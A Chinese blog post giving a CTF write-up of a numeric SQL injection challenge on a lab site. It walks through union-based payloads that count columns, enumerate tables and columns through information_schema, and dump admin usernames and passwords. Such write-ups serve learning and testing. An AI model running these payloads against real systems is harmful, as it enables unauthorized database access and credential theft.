CTF刷题--SQL注入

靶场第1题,SQL注入

题目

在这里插入图片描述
链接:http://59.63.200.79:8003/

解题思路

打开链接,发现是一个网站,里面有个点击新闻,尝试点开。。。。
在这里插入图片描述
点开以后,域名变为:http://59.63.200.79:8003/?id=1
怀疑是不是有数字型SQL注入呢?
构造payload试一试
在这里插入图片描述
使用hackbar构造payload and 1=1,发现回显成功。。
在这里插入图片描述
构造and 1=2,发现回显失败。。所以判定为数字型SQL注入。下面开始SQL联合注入。。。
在这里插入图片描述
第一步:判断字段数
构造payload :http://59.63.200.79:8003/?id=1 order by 2#
回显成功,说明数据库有两个字段(列)
在这里插入图片描述
第二步:判断回显位置(方便获取数据库信息)
构造payload: http://59.63.200.79:8003/?id=1 and 1=2 union select 1,2
获取到显示位
在这里插入图片描述
第三步:获取当前数据库信息
构造payload:
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()#
在这里插入图片描述
第四步:获取数据库表
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
发现admin表,这个表中一般存放账号和密码
在这里插入图片描述

第五步:获取字段
构造 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’#
在这里插入图片描述
第六步:获取数据
构造获取用户名:http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username) from admin#
在这里插入图片描述
构造获取密码:http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(password) from admin#
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值